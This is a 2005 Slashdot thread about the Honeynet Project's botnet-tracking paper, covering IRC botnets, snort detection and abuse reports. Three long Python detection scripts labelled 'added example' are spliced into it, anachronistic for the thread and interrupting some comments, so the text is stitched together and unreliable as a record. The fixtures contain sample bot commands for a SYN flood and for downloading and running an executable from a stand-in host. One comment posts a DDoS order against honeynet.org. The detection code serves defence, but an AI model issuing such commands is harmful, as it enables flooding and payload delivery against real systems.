Security

Observing Botnets with Honeynets 118

Susan Saradon writes "The Honeynet Project has released a new paper which deals with the observation of botnets. "Know Your Enemy: Tracking Botnets" discusses what Botnets are, who is using them, how, and why. It also introduces the tools "mwcollect" and "drone" which can be used for collecting and tracking Botnet activity. Nice to read and looking forward to the release of these tools."
  • by Enigma_Man ( 756516 ) on Tuesday March 15, 2005 @09:40AM (#11942966) Homepage
    logging into the IRC channels of botnets, and trying to introduce myself, and asking "a/s/l" and getting all huffy that nobody's answering. Or talking like a robot.

    -Jesse
  • by maotx ( 765127 ) <maotx@yCOWahoo.com minus herbivore> on Tuesday March 15, 2005 @09:42AM (#11942978)
    While I was going to submit this as a story, it would seem more appropriate as a link from this one.

    News.com [com.com] has an interesting article [com.com] talking about how bot nets have migrated mainly from DoS to wide-spread spies. A growing number of bot nets have been used to gather sensitive identity information and install adware and spyware. The Honeynet Project [honeynet.org] estimates that some of the networks are made up of more than 50,000 computers.
  • by bigtallmofo ( 695287 ) on Tuesday March 15, 2005 @09:48AM (#11943020)
    During these few months, we saw 226,585 unique IP addresses joining at least one of the channels we monitored [...] This shows that the threat posed by botnets is probably worse than originally believed

    Doesn't this qualify as the understatement of the year? Never in my wildest dreams did I think a botnet would grow above a few tens of thousands hosts. There's no explanation for such a botnet other than a professional full-time organization specifically created for profit.

    Anyway, I couldn't have imagined a better or more authoritative write-up of botnets. Hopefully though it doesn't add fuel to the various ??AA organization's fire of declaring IRC a scourge on humanity.
    • by LiquidCoooled ( 634315 ) on Tuesday March 15, 2005 @10:11AM (#11943164) Homepage Journal
      No, here at work, we just have to sneeze loudly and we get a new IP.

      Windows machines that reboot continuously because they keep crashing mean new IPs are allocated every time the user reconnects to his ISP.
    • It's a worrying figure, yes, but at least part of that is likely to be from dynamic IP hosts: the dialup people and so on
    • There's no explanation for such a botnet other than a professional full-time organization specifically created for profit.

      Yes, there is, a lot of DDOS power. A lot of xdcc bots. Script kiddies with zero skills can pull it off.

      Hopefully though it doesn't add fuel to the various ??AA organization's fire of declaring IRC a scourge on humanity.

      Just because botnets use IRC networks as a place of gathering does not mean IRC is a scourge on humanity. ??AA are not even worried about such things, there
      • "Script kiddies with zero skills can pull it off"

        Totally agree, but you have to admit that someone with 50,000 +/- bots available to them is a dangerous person.

        Side question, where is the quote in your sig from?
        • Agreed. I don't care if you are a script kiddie; if you get a botnet that big, then you command my respect -- not because of technical skills, but the amount of computing capital that you have, and the power that you can wield on the internet with it. Now, that is not to say that you may know how to use it, but you could still sell that bot net to someone else.
    • by Anonymous Coward
      Note that "unique IP addresses" also includes those of infected computers that reconnected during the period the channels were monitored - assigning new IPs on a reconnect is very popular not only with modem / ISDN, but even with DSL ISPs.
      Some ISPs even assign a new IP every 12 or 24 hours, meaning that even if only a small part of that botnet was made up of nodes on a connection like that, they'd have a significant influence on the number of "unique IP addresses".
    • Hopefully though it doesn't add fuel to the various ??AA organization's fire of declaring IRC a scourge on humanity.

      I hate to be the one to tell you this, but they have been for a while now. I poked my head in a few a while back, and..well, granted, it was early on a school night, but for being a supposed linux help channel, it was sure full of geek talking about tits. I hung around for close to 2 hours, and one guy even got yelled at for asking a question.
      • by Anonymous Coward
        Sounds like you came to our channel. I don't know about you, but when we get questions like "how do I install an irc server on my root?" we get pissed off. We get a half dozen people a day who try to use the l33t sk1llz on us that they picked up from #rohack, then curse at us in gibberish when it doesn't work and we won't help them with it. Not to mention the hourly trolls and so on.

        Our channel has a policy. If you want someone to lead you gently by your dick, cry to your momma. If you've read ESR's Ho [catb.org]
    • by EnglishTim ( 9662 ) on Tuesday March 15, 2005 @10:26AM (#11943296)
      There's no explanation for such a botnet other than a professional full-time organization specifically created for profit.

      That... or the network has attained self-awareness and is trying to recruit all our PCs to conquer the world!

      THROW YOUR PC OUT OF THE WINDOW. IT'S THE ONLY WAY TO BE SURE.
    • While the most valuable bots are on always-on broadband connections, I expect many are on dial-up. Over a "few months" a PC connecting over dialup could use dozens of IPs. With a big ISP (big IP pool) and a user averaging more than one connection per day you could get >>100 IPs per bot over a few months.
    • by fm6 ( 162816 )

      Never in my wildest dreams did I think a botnet would grow above a few tens of thousands hosts.

      Lots of people did, though. Not botnets as such, but it's been clear for several years that Windows is extremely vulnerable to automated infiltration.

      There's no explanation for such a botnet other than a professional full-time organization specifically created for profit.

      A "professional full-time organization" can be one guy. But I'm guessing you mean something more serious, like somebody's raised some invest

    • As I understand it, that figure was all botnets they monitored combined.
      Not a single one.

      But as we all know, on the internet "size doesn't matter much".
      Switch your bots to a lightweight (UDP based?) protocol, partition up the botnet or make it P2P and you can handle any insane number of bots.

      Remember, as soon as a new Windows vulnerability is discovered (the current rate seems to be about one serious remote exploit every 3 months) your malicious botnet-operator only needs to "plug in" the new exploit and h
    • There's no explanation for such a botnet other than a professional full-time organization specifically created for profit.

      You're right. Criminals are making profit from botnets and they to for at least a year from now [heise.de].

    • If you're a university research project, it's fun to just look at all the action, but the obvious next step is to find something constructive to *do* with the information. One problem is LARTing the infected boxes, and a separate problem is tracking the zombie masters, and somewhere in between is tracking the IRC networks (which may be owned by the zombie masters or may be innocent.) Tracking the zombie masters, while important, is highly non-trivial for a competently run botnet, because the master hopef
  • by duffbeer703 ( 177751 ) * on Tuesday March 15, 2005 @09:54AM (#11943048)
    I'd love to use bot nets to spot, stop or even patch new/unknown machines on my network.
  • WTF? (Score:5, Funny)

    by Quixote ( 154172 ) * on Tuesday March 15, 2005 @09:59AM (#11943086) Homepage Journal
    FTFA:
    In one case, bot software detected whether the game "Diablo II" was installed on the host PC. If the game was present, the program would steal items from the player's characters and drop them at preplanned places in the online game world. The bot net's controller would then collect the items and sell them on auction site eBay, Holz said.

    What the... ? Stealing identities and installing viruses is one thing; but to actually go and steal stuff from Diablo-II?? Have these guys no shame???

    • Selling D2 items is more profitable than you might think...
    • Re:WTF? (Score:5, Interesting)

      by Reene ( 808293 ) on Tuesday March 15, 2005 @10:12AM (#11943175) Journal
      I would imagine it is much more profitable, at least in the short run, to do things like this. Same would be true for Everquest if it's possible to steal items in this manner, but I am unfamiliar with how exactly the item system in that game works (was always a Diablo fan, not a EQ fan).

      The prices some of these things fetch is insane even to the most hardcore of gamers..But I guess if you've got that much money to blow anything starts looking good. Hell, you should see some of the prices the shit on the text-based MUD DragonRealms [play.net] fetches. Upwards of thousands of dollars for characters, rare items, and currency. And it's easy to shell out anywhere from $30-$500 a month directly to the company that runs the game itself, nevermind the underground networks of illegal buying and selling of characters/items/money. But I digress...
      • With the exception of the EQ roleplay server, most high end items are no drop and can not be dropped or traded anyway. Tradeable high quality items however do exist and could fetch a fair price if a bot was able to transfer them, assuming the item in question was not made no drop by use of an augmentation. Most items like this are lore so any one character can only have one in his possession at a time, which would place limits on scalability. Coin can no longer be dropped in the game and has to be transfered d
  • detection of botnets (Score:5, Informative)

    by kc0re ( 739168 ) on Tuesday March 15, 2005 @10:04AM (#11943118) Journal
    For those of you that use Snort [snort.org] as an Intrusion Detection System, there are some excellent rules that will detect botnets located at BleedingSnort [bleedingsnort.com]

    Look for IRC rules that are non-standard ports. Very easy to run.
    • I never run IRC, so these hits are just making me laugh. I'm seeing SQLSlammer traffic as well. Network security is a great laugh.
    • Agreed. Snort is an excellent way to monitor botnets. But that's not the best part: The best part is shutting them down.

      Most people don't realize that the IRC server itself is being hosted on an infected zombie machine. (Think supernodes on P2P.) An email to that IP's abuse contact will often get the server shutdown quickly. Educational institutions are usually especially good about taking care of the problem.
      • Most people don't realize that the IRC server itself is being hosted on an infected zombie machine. (Think supernodes on P2P.) An email to that IP's abuse contact will often get the server shutdown quickly.

        That doesn't shut down the botnet. The operator simply picks a new "supernode", installs an irc server on it, and associates its IP number with the dynamic DNS name that's hardcoded into the bots.

        • You've got a good point. However, I've seen client fail to reestablish communication with a new server after the existing server is shut down. The transition isn't as easy as you describe all of the time.
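The rules recommended above match IRC on ports other than the usual 666x range. Here is the same logic as a small Python classifier over reassembled TCP payloads, added here as an illustration; it is not the Honeynet Project's drone or mwcollect code and not a BleedingSnort rule. It identifies a flow as IRC from the protocol exchange in both directions (so one stray keyword in an HTTP body does not fire), flags IRC flows whose destination port is not a conventional IRC port, and pulls out the nick and the channel/key the bot registered with, which is exactly what you need for the abuse report discussed in the replies. The flows, hosts, nick, channel and topic below are constructed for the example.

```python
"""Port-independent IRC detection with C&C channel extraction (added example)."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Conventional IRC ports; anything else carrying IRC is worth a look.
IRC_PORTS = {6660, 6661, 6662, 6663, 6664, 6665, 6666, 6667, 6668, 6669, 6697, 7000}

# Client registration/command lines, anchored at line start and followed by a
# space so a form field such as "NICK=bob" inside an HTTP body does not count.
CLIENT_CMD = re.compile(rb"^(?:PASS|NICK|USER|JOIN|PRIVMSG|PONG) ", re.M)
# Server lines: ":prefix 001 nick ..." numerics or ":prefix JOIN/PRIVMSG/... ".
SERVER_MSG = re.compile(rb"^:\S+ (?:\d{3}|JOIN|PRIVMSG|TOPIC|NOTICE|MODE)\b", re.M)
NICK_LINE = re.compile(rb"^NICK[ \t]+(\S+)", re.M)
JOIN_LINE = re.compile(rb"^JOIN[ \t]+(#\S+)(?:[ \t]+(\S+))?", re.M)  # (channel, key)


@dataclass
class Flow:
    src: str
    dst: str
    dport: int
    c2s: bytes  # reassembled client -> server bytes
    s2c: bytes  # reassembled server -> client bytes


@dataclass
class IrcHit:
    flow: Flow
    score: int
    nick: Optional[bytes]
    channels: List[Tuple[bytes, bytes]] = field(default_factory=list)


def classify_irc(flow: Flow, min_score: int = 3) -> Optional[IrcHit]:
    """Score both directions of the flow; below min_score it is not called IRC."""
    score = len(CLIENT_CMD.findall(flow.c2s)) + len(SERVER_MSG.findall(flow.s2c))
    if score < min_score:
        return None
    nick = NICK_LINE.search(flow.c2s)
    return IrcHit(flow, score, nick.group(1) if nick else None,
                  JOIN_LINE.findall(flow.c2s))


def irc_on_nonstandard_ports(flows: List[Flow]) -> List[IrcHit]:
    """IRC flows whose server port is not a conventional IRC port."""
    return [h for h in (classify_irc(f) for f in flows)
            if h is not None and h.flow.dport not in IRC_PORTS]


# Constructed sample traffic (not captured data). The bot's nick format and the
# ".advscan" topic mimic the style the paper describes; the values are made up.
BOT_C2S = (b"PASS letmein\r\n"
           b"NICK [DEU|XP|12345]\r\n"
           b"USER xp 0 0 :xp\r\n"
           b"JOIN #bots k3y\r\n")
BOT_S2C = (b":irc.example.test 001 [DEU|XP|12345] :Welcome\r\n"
           b":[DEU|XP|12345]!xp@192.0.2.5 JOIN :#bots\r\n"
           b":irc.example.test 332 [DEU|XP|12345] #bots :.advscan lsass 100 5 0 -r -s\r\n")
HUMAN_C2S = b"NICK alice\r\nUSER alice 0 * :Alice\r\nJOIN #linux\r\n"
HUMAN_S2C = (b":irc.example.test 001 alice :Welcome\r\n"
             b":alice!alice@192.0.2.7 JOIN :#linux\r\n")
WEB_C2S = b"POST /nickname HTTP/1.1\r\nHost: www.example.test\r\n\r\nNICK=bob\r\n"
WEB_S2C = b"HTTP/1.1 200 OK\r\nContent-Length: 2\r\n\r\nok"

SAMPLE_FLOWS = [
    Flow("192.0.2.5", "198.51.100.9", 1863, BOT_C2S, BOT_S2C),   # IRC hidden on MSN's port
    Flow("192.0.2.7", "198.51.100.9", 6667, HUMAN_C2S, HUMAN_S2C),  # ordinary IRC
    Flow("192.0.2.8", "198.51.100.10", 8080, WEB_C2S, WEB_S2C),  # HTTP, must not fire
]

if __name__ == "__main__":
    for hit in irc_on_nonstandard_ports(SAMPLE_FLOWS):
        print(f"{hit.flow.src} -> {hit.flow.dst}:{hit.flow.dport} IRC score={hit.score} "
              f"nick={hit.nick!r} channels={hit.channels}")
```

Report the channel and key together with the server address and port: the abuse contact can confirm the hit in seconds, and if the server moves to another supernode behind the same dynamic DNS name the nick pattern is what lets you recognise the same botnet again.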

  • Acting *and* Botnets. Damn!
  • by Necrotica ( 241109 ) <cspencer@lanlor d . ca> on Tuesday March 15, 2005 @10:08AM (#11943146)
    I'm an op in a large channel on the Undernet and spam is definitely a growing problem. I see lots of spambots join/part our channel and an unusually high percentage of them come from Romania.

    You would think that the Undernet admins could simply force users to login to X, thus dramatically reducing the problem. However they are not willing to do that. As a sysadmin myself, never in a million years would I turn a blind eye to one of my services being used completely inappropriately and I would take the steps necessary to prevent it.
    • Set up an IRC server somewhere. The costs of a shell account are negligible and it's good fun to tinker around with.
    • At the risk of self promotion, some IRC networks _do_ do something about it. On AfterNET, any IP listed in SORBS, NJABL, Blitzed, or from Romania etc. must login to connect. This results in much less spam and an overall better signal to noise ratio.
  • For the folks who are planning to re-use those tools to analyze botnets, they should think again. The botnet "controller" usually DDoSes the monitoring machine. They would also observe their bots for consistency. Moreover, they would keep changing the protocol, making it difficult for people to construct clients to connect to those IRC channels.
  • by aug24 ( 38229 ) on Tuesday March 15, 2005 @10:13AM (#11943181) Homepage
    ...could one of you chaps out there with more time than me please brute-force the password to these IRC servers and update these bot machines with a file which throws up a popup saying "You have been hacked you idiot, get someone to help you secure this box (or I will steal your credit card details").

    J.

  • WTF? Am I the only one who thinks it's funny that so many of these bots are under the GPL - as if the criminals who use them will care about the finer points of copyright law. What idiots.
    • Maybe it's not so much that it's GPL'd, but that it can be hosted on sites like sourceforge. I'm not familiar with the terms of sourceforge, but I know of at least a few projects on sourceforge that are used to host botting programs for various online games.

      Why pay for a host when you can just have SF host it for you?
    • Am I the only one who thinks it's funny that so many of these bots are under the GPL - as if the criminals who use them will care about the finer points of copyright law.

      You are forgetting that many of the people involved are retarded. If you look on direct connection networks or even in Usenet groups where things like stolen fonts are traded you won't have to look long to find one fuckwit complaining that one of the archives of pirated material he/she/it put together has been "ripped off" by some other t

  • Spidering (Score:3, Interesting)

    by menace3society ( 768451 ) on Tuesday March 15, 2005 @10:30AM (#11943320)
    Does it bother anyone else that they imply that spidering is related to DDoS and botnets?

    Note that DDoS attacks are not limited to web servers, virtually any service available on the Internet can be the target of such an attack. Higher-level protocols can be used to increase the load even more effectively by using very specific attacks, such as running exhausting search queries on bulletin boards or recursive HTTP-floods on the victim's website. Recursive HTTP-flood means that the bots start from a given HTTP link and then follow all links on the provided website in a recursive way. This is also called spidering.

    Any time I see this sort of obvious attempt to build paranoia, it makes me suspicious of the whole article.

    • "Does it bother anyone else that they imply that spidering is related to DDoS and botnets? "

      When the bots are doing nothing but http requests and database requests on your site by doing search queries and following links, then yes that would be a DDoS attack.

      Any attack relating to damaging a service is a DDoS.

      Much better than just DDoS attacking a single domain with an HTTP request attack; there are a few reasons for doing it this way. My guess would be that maybe it's harder to notice by viewing your logs.
      • The problem is that they imply that spidering is only ever used for DoS attacks, which patently isn't true. Unless, of course, you think that being linked to by Google is a DoS attack.
    • Yeah how ridiculous, everyone on Slashdot knows you can't do any harm with a sudden flood of HTTP requests from a million different IPs... oh wait...
    • Nope, what they describe *is* spidering. The difference between DDoS attacks and legitimate spidering by search engines, etc. is probably the "niceness", e.g. the delay between requests, respecting robots.txt, etc. Any implication "that spidering is related to DDoS and botnets" is all in your imagination. Go put your tinfoil hat back on bud.
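The "niceness" distinction in the reply above can be measured. The following is an added example, not from the paper or from anyone in this thread: it scores each source in constructed Apache combined-log lines on the delay between its requests, whether it fetched robots.txt, and how much of its traffic goes to an expensive endpoint, then counts how many impolite sources hit that endpoint inside one time window. The second step is what makes a botnet flood visible: a single bot can be slow enough to look like a browser, but fifty of them running search queries in the same minute cannot. The /search endpoint, the one-second politeness threshold, the IP addresses and the log lines are all assumptions made for the example.

```python
"""Spider or recursive HTTP flood? Behavioural scoring over web-server logs (added example)."""
import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime
from typing import Dict, List, Optional

# Apache combined log: ip ident user [time] "METHOD path proto" status size ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
EXPENSIVE_PREFIXES = ("/search",)  # assumption: the costly, database-backed endpoint
POLITE_GAP_S = 1.0                 # assumption: a well-behaved crawler waits >= 1 s


@dataclass
class Request:
    ip: str
    ts: datetime
    path: str


@dataclass
class Profile:
    requests: int
    min_gap: Optional[float]   # smallest inter-request delay in seconds, None if one request
    fetched_robots: bool
    expensive_frac: float      # share of requests to expensive endpoints


def parse_line(line: str) -> Optional[Request]:
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, _method, path, _status = m.groups()
    return Request(ip, datetime.strptime(ts, TS_FMT), path)


def profile_sources(lines: List[str]) -> Dict[str, Profile]:
    by_ip: Dict[str, List[Request]] = defaultdict(list)
    for line in lines:
        req = parse_line(line)
        if req:
            by_ip[req.ip].append(req)
    profiles = {}
    for ip, reqs in by_ip.items():
        reqs.sort(key=lambda r: r.ts)
        gaps = [(b.ts - a.ts).total_seconds() for a, b in zip(reqs, reqs[1:])]
        expensive = sum(r.path.startswith(EXPENSIVE_PREFIXES) for r in reqs)
        profiles[ip] = Profile(len(reqs), min(gaps) if gaps else None,
                               any(r.path == "/robots.txt" for r in reqs),
                               expensive / len(reqs))
    return profiles


def classify(p: Profile) -> str:
    """'crawler' if polite and robots-aware, 'flood' if hammering expensive paths."""
    polite = p.min_gap is None or p.min_gap >= POLITE_GAP_S
    if p.fetched_robots and polite:
        return "crawler"
    if not polite and p.expensive_frac > 0.5:
        return "flood"
    return "unknown"


def distributed_flood(lines: List[str], window_s: int = 60, min_sources: int = 3) -> Dict[int, List[str]]:
    """Windows (epoch // window_s) in which >= min_sources non-crawler IPs hit expensive paths."""
    crawlers = {ip for ip, p in profile_sources(lines).items() if classify(p) == "crawler"}
    buckets: Dict[int, set] = defaultdict(set)
    for line in lines:
        req = parse_line(line)
        if req and req.ip not in crawlers and req.path.startswith(EXPENSIVE_PREFIXES):
            buckets[int(req.ts.timestamp()) // window_s].add(req.ip)
    return {k: sorted(ips) for k, ips in buckets.items() if len(ips) >= min_sources}


# Constructed log lines (not real traffic): one polite crawler, one human, five bots.
def _line(ip: str, hhmmss: str, path: str, ua: str) -> str:
    return f'{ip} - - [15/Mar/2005:{hhmmss} +0000] "GET {path} HTTP/1.1" 200 512 "-" "{ua}"'

SAMPLE_LOG = [
    _line("10.1.1.1", "10:30:00", "/robots.txt", "ExampleBot/1.0"),
    _line("10.1.1.1", "10:30:02", "/index.html", "ExampleBot/1.0"),
    _line("10.1.1.1", "10:30:04", "/search?q=intro", "ExampleBot/1.0"),
    _line("10.3.3.3", "10:30:05", "/index.html", "Mozilla/5.0"),
    _line("10.3.3.3", "10:30:09", "/about.html", "Mozilla/5.0"),
]
for _i in range(1, 6):  # each bot fires three search queries within two seconds
    SAMPLE_LOG += [
        _line(f"10.2.0.{_i}", "10:30:10", f"/search?q=a{_i}", "Mozilla/4.0"),
        _line(f"10.2.0.{_i}", "10:30:10", f"/search?q=b{_i}", "Mozilla/4.0"),
        _line(f"10.2.0.{_i}", "10:30:11", f"/search?q=c{_i}", "Mozilla/4.0"),
    ]

if __name__ == "__main__":
    for ip, p in profile_sources(SAMPLE_LOG).items():
        print(ip, classify(p), p)
    print(distributed_flood(SAMPLE_LOG))
```

Per-source scoring alone would miss a botnet that rate-limits each bot; the windowed count of distinct impolite sources on the expensive path is the part to alert on, and the crawler exclusion keeps a search engine that happens to index your search page out of the count.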
  • When the bots become self aware, then it is time to worry.
  • by Anonymous Coward on Tuesday March 15, 2005 @11:56AM (#11944194)
    I found a gaobot variant at work a month back and ran it on a Virtual PC at home. One thing the article doesn't mention is that the variant would connect to a free dynamic IP address server (in my case *.ma.cx) to figure out the IP of the IRC server. I fired up mIRC, and joined the channel my bot was joining, and sent the OP a message. We started talking for a bit. At first he thought I was some other black hat and he started bragging about having over 50,000 machines in his network. Wanted to know if I wanted to trade bots and the like. When he figured out what I was really doing, he banned me.

    I sent messages to the ISP of the IRC server (in this case IPowerWeb) and to the dynamic DNS server to the effect of "Hey, someone's using your service for hacking" with all my details and such. Nothing happened. Guess they just don't care.
  • .ddos.syn honeynet.org 80 99999999999999999
  • At some point in the not-too-distant future, I foresee a disgruntled botnet operator (or an unethical sysadmin who's getting DDoSed) causing about 100,000 0wned home computers to spontaneously "deltree /y c:".

    At that point, we may see the average end-user become slightly more concerned about network security.

    In fact, I'm a little surprised it hasn't happened already.
    • I doubt this will happen (maybe by accident or some "failed" update, though).
      The botnet is so "useful", why should he intentionally wipe it out?

      My guess would be that we'll just be seeing more of the same. A lot more.
      Phishing will grow bigger as more clueless users get infected with keylogging bots that send their bank info home, the blackmailing crowd might move on to more high profile victims (ebay down for a day? 100k bots can do it) and the botnet/worm creators will of course constantly get more creativ
  • We recently had a very unusual update run on one of our monitored botnets: Everything went fine, the botnet master authenticated successfully and issued the command to download and execute the new file. Our client drone downloaded the file and it got analyzed, we set up a client with the special crafted nickname, ident, and user info. But then our client could not connect to the IRC server to join the new channel. The first character of the nickname was invalid to use on that IRCd software. This way, the (s
  • If you're monitoring these 'bot nets, why not do something useful instead -- like delete the d@mn 'bot programs off the compromised machines instead!

    Oh, yeah, you'd be out of a job at that point once they were gone.

    • The whole purpose was to gather evidence and details of the botnets. If you don't understand how the bots work, then it is hard to find how to defend against them. By knowing the targets, the goals and how they communicate you can both detect them on a network, and defend against them (for example, if you administer a corporate network, having the signatures of a bot with Snort can be quite useful in intercepting bot traffic). The other interesting thing was that the bot nets use IRC channels to communicat
      • The whole purpose was to gather evidence and details of the botnets...The value of having this information is far more useful than deleting the bot off a computer.

        Of course you misunderstood my post completely, yet replied anyway.

        1: Find how the 'bots operate.
        2: Send the 'botnet instructions to patch the vulnerability if present, and self-delete immediately afterwards.

        Do not study them forever while they continue to wreak havoc on the rest of the Internet.

        Clear now?

    • The Honeynet Project is a research project - cleaning up infected users and squashing evildoers is more of an ISP problem. Research Projects aren't out of a job unless they run out of funding (or unless they solve all computer security problems and greedy/malicious people stop exploiting the net, but that ain't happening.)

      Letting the ISPs of the infected users know is a worthwhile activity; running a public blacklist of them might also be. It sounds like they complained to some of the IRC net operators,

  • I've noticed that a lot of online banking sites are now switching from typed passwords to "keypad" buttons that you have to click with a mouse. The order of the buttons changes every time the page is loaded, so sniffing the mouse position won't help. This seems like a good basic security measure and I'm a bit surprised it hasn't been universally adopted.

    Just wondering, from those who know about such things - Short of doing a realtime screen capture and sending the video of the mouse moving over the button

  • I have a wireless router which came with my DSL account, I used to use one of my own. Anyway, since I'm using a router with NAT translation (all the computers connected have 192.1.1.xxx addresses so outside traffic does not filter to them) only returning traffic will get through.

    I read that there are 4 service ports that get 80% of the zombie traffic in attempts to capture machines, so I decided to put port logging and discard on those 4 ports (195-197 and 443), and see what happened.

    Within ONE MINUTE of

  • I found this article to be very interesting, but noted the following section in the writeup;

    We use snort_inline for Data Control and replace all outgoing suspicious connections. A connection is suspicious if it contains typical IRC messages like " 332 ", " TOPIC ", " PRIVMSG " or " NOTICE ". Thus we are able to inhibit the bot from accepting valid commands from the master channel. It can therefore cause no harm to others - we have caught a bot inside our Honeynet.

    I'm wondering why the Botnet writers don
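The data-control rule quoted above works by byte substitution: snort_inline's replace action overwrites matched content in the packet, and the replacement has to be the same length as the match because an inline rewrite that changed the segment length would desynchronise TCP sequence numbers. The following is an added example, not the Honeynet Project's rule set, that applies the same idea to a reassembled IRC payload: each " 332 ", " TOPIC ", " PRIVMSG " or " NOTICE " token is overwritten with X's of equal length, and a minimal model of a bot's command dispatcher shows that the rewritten lines no longer yield commands. The sample session, server name, addresses and ".ddos.syn"/".update" commands are constructed for the example.

```python
"""Same-length neutralisation of IRC command traffic, snort_inline style (added example)."""
import re
from typing import List, Tuple

# The paper's tokens. The leading space plus the trailing-space lookahead mean
# only a whole IRC verb or numeric matches; IRC verbs are case-insensitive,
# so a bot fed lowercase "privmsg" is covered as well.
SUSPICIOUS = re.compile(rb" (332|TOPIC|PRIVMSG|NOTICE)(?= )", re.I)

# What a typical IRC bot executes: commands beginning with "." carried in the
# channel topic (numeric 332), in TOPIC changes, or in PRIVMSGs to the channel.
CMD_LINE = re.compile(rb"^:\S+ (?:332 \S+ \S+|PRIVMSG \S+|TOPIC \S+) :(\.\S+.*)$", re.M | re.I)


def neutralise(payload: bytes) -> Tuple[bytes, int]:
    """Overwrite each matched token with X's of identical length.

    Returns (rewritten payload, number of tokens rewritten). The length of the
    payload is unchanged, which is the invariant an inline rewrite must keep.
    """
    out, n = SUSPICIOUS.subn(lambda m: b" " + b"X" * len(m.group(1)), payload)
    assert len(out) == len(payload)
    return out, n


def bot_commands(payload: bytes) -> List[bytes]:
    """Commands a bot's dispatcher would pull out of this payload."""
    return [m.group(1).rstrip(b"\r") for m in CMD_LINE.finditer(payload)]


def data_control(segments: List[bytes]) -> Tuple[List[bytes], int]:
    """Apply neutralise to every segment of a connection; returns what is forwarded.

    Note: matching per segment, as here, can be evaded by splitting a token
    across two TCP segments; an inline deployment has to match on the
    reassembled stream.
    """
    forwarded, total = [], 0
    for seg in segments:
        out, n = neutralise(seg)
        forwarded.append(out)
        total += n
    return forwarded, total


# Constructed sample traffic from server to the captured bot (not captured data).
SAMPLE = (b":irc.example.test 332 [DEU|XP|12345] #bots :.ddos.syn 192.0.2.1 80 600\r\n"
          b":master!m@198.51.100.1 PRIVMSG #bots :.update http://198.51.100.1/x.exe 1\r\n"
          b":irc.example.test NOTICE AUTH :*** Looking up your hostname\r\n"
          b"PING :irc.example.test\r\n")

if __name__ == "__main__":
    print("before:", bot_commands(SAMPLE))
    rewritten, n = neutralise(SAMPLE)
    print(f"rewrote {n} tokens, length {len(SAMPLE)} -> {len(rewritten)}")
    print("after: ", bot_commands(rewritten))
```

The limits are the ones the thread already hints at: the filter only knows the four tokens, so a bot whose operator renames the commands, moves them into a field the rules do not cover, or encrypts the channel traffic (the "keep changing the protocol" point made earlier) is not contained, and PING/PONG is deliberately left alone so the captured bot stays connected and keeps showing the channel activity the honeynet is there to record.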
